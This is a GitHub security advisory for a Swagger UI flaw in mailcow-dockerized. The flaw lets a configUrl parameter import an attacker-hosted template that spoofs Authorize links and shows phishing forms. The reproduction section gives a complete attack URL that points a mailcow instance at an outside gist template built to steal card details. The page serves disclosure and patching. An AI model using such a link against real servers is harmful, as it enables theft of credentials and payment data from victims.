You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
DerLinkman
published
GHSA-vjgf-cp5p-wm45Sep 27, 2022
Package
Swagger UI
(mailcow-dockerized)
Affected versions
< 2022-09
Patched versions
>= 2022-09
Description
Impact
It allows an attacker to craft a custom swagger api template, being possible to spoof Authorize links redirecting a victim to an attacker controller place in order to steal swagger authorization credentials or create a phishing page to steal credit card information
Patches
The issue has been fixed with the 2022-09 mailcow Mootember Update.
Workarounds
Delete the Swapper API Documentation from your E-Mail Server (mostly located under: data/web/api).
Impact
It allows an attacker to craft a custom swagger api template, being possible to spoof Authorize links redirecting a victim to an attacker controller place in order to steal swagger authorization credentials or create a phishing page to steal credit card information
Patches
The issue has been fixed with the 2022-09 mailcow Mootember Update.
Workarounds
Delete the Swapper API Documentation from your E-Mail Server (mostly located under:
data/web/api
).Reproduction
Mostly all mailcow instances have a active swagger instance with url import enabled.
With that a configUrl parameter followed by a template can be passed to the URL:
https://gist.githubusercontent.com/AMontesG/54d92f04ea29385602670e81db2f3888/raw/124dc444aea84ac0a2a0d8f76f86b9e192123aa6/card.json
The api template template can be hosted in an attacker's server in order to be imported, this template contains custom html tags, this one for example would allow an attacker to steal credit card information :
With that the attacker only needs to send the swagger UI link with its crafted template to a victim, in this case the url would be :
https://mail.yourhostname.tld/api/index.html?configUrl=https://gist.githubusercontent.com/AMontesG/54d92f04ea29385602670e81db2f3888/raw/124dc444aea84ac0a2a0d8f76f86b9e192123aa6/card.json
For more information
If you have any questions or comments about this advisory:
Thanks to Swisscom for reporting this to us!